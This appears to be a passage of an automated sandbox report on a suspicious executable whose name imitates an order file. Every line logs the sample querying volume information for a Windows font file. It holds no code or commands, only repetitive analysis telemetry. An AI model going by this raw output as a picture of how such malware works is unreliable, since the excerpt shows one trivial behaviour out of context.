                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
